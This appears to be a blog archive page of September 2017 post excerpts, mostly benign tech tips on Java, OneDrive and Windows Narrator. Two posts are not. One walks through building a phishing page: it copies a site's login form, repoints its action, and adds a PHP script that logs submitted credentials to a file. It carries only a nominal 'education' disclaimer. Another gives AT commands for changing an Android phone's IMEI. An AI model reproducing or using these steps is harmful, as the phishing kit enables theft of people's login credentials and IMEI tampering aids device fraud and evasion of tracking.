Skip to main content

Posts

Showing posts from September, 2017

Programmer Reference Material

    Java was originally developed by James Gosling at Sun Microsystems (now     merged with Oracle Corporation). Java applications are compiled to     bytecode (a .class file) that can run on any Java Virtual Machine (JVM)     regardless of the underlying computer architecture. The language first     appeared in 1995 and is now in version 7.     Java source code is saved in .java files. Files consist of class     definitions. A .java file can have multiple class definitions (where a     .class file will be generated for each), but only one class may be     marked public. If there is a public class in the .java file, the file-     name of the .java file must exactly match the name of the public class     within it.     After you get the JDK installed and included in the Path environment     variable, you can compile your programs using:         javac myFile.java     And you can run them using:         java myFile     The remainder of this file includes code snippets that

How to Use OneDrive to Fetch Files on Another PC

Need to access files on another PC in a different location? With a few exceptions, you can perform that trick as long as both machines are running Microsoft's OneDrive. The main function behind Microsoft's OneDrive storage service is to save your files in the cloud and across different PCs. That way the same documents, photos, and other files stay in sync online and on your computers. But you can also use OneDrive to access folders and fetch files directly on another PC—and those files don't need to be part of your OneDrive group. There are a few caveats. You'll need a Microsoft account to use OneDrive.Both PCs need to be connected to the internet with OneDrive active and the fetch setting turned on.You can fetch files from a PC running Windows 7, 8, and 10 but  not 8.1 .You can connect to the remote PC and access its files from a PC running 7, 8, 8.1, or 10 as well as from a mobile device such as an iPhone, iPad, or Android gadget.You can also fetch files on a Win

How to Use Windows 10's Narrator to Read Your Screen Aloud

Offering you a way to hear your text and screen elements read aloud, Narrator has been a fixture of Windows for years. How can you customize and use it in Windows 10? Windows has long offered a screen and text-to-speech reader called Narrator, which lets you hear every action you take in Windows spoken aloud. Narrator can also read aloud to you any text in a document or other file. It's designed for the visually impaired, but it can be used by anyone who wants the screen or text read aloud. Let's see how it works in  Windows 10 . Click on the Start button > Settings > Ease of Access > Narrator. The Narrator pane appears. Windows 10 Narrator Turn on the Narrator button. This also activates a Narrator Settings window, which by default is minimized on the Windows taskbar; more on that later. Windows 10 Narrator First, let's look at the active Narrator window. As you scroll down and peruse the different settings, you'll find the following items that you c

How to Tweak/Change your Imei on Android

1. Download MTK Engineering apk 2. Open the MTK app and scroll to Engineering mode (MTK) and click it. 3. Click on CDS information 4. Click the Radio information and you will get phone 1 and phone 2. Depending on the sim imei you wish to change, phone 1 is sim 1 and phone 2 is sim 2 5. To change sim 1 imei number, touch phone 1 and in the popup, touch the AT+ 6. Once you touch the Key board will pop up. In the key board you type any single letter and cancel only the letter you have type. Immediately you can notice the scribes that is required for you It looks like AT+EGMR=1,7"" 7. Click the first row and after 7 you can notice the simple "" delete the last inverted comma and type the imei number you generated 8. Verify the typed imei numbers, then close the inverted commas " 9. Click the SEND AT COMMAND 10. Once the pop up display indicates AT command successfully send 11. Put your phone in Airplane more off for 60 seconds the on

How to Make a Phisher/Fake Page For Any Website 

Disclaimer this for education purpose ⚠️ : Android And Pc  ⚙️ First open the website in a browser for which you want to create a phishing page . Now right click in an empty space and select view source , copy all the contents to a note pad and save it as something.html  Example : yahoo.html  ⚙️ Now open Yahoo.html (something.html) in a notepad .Now search for the string  "action = https.." and change the address tologin.php and change method = " Post" to "GET" Finally save it  ⚙️ 3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php ⚙️ 3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php  <?php header ('Location: http://  yahoo.com'); $handle = fopen("log.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($han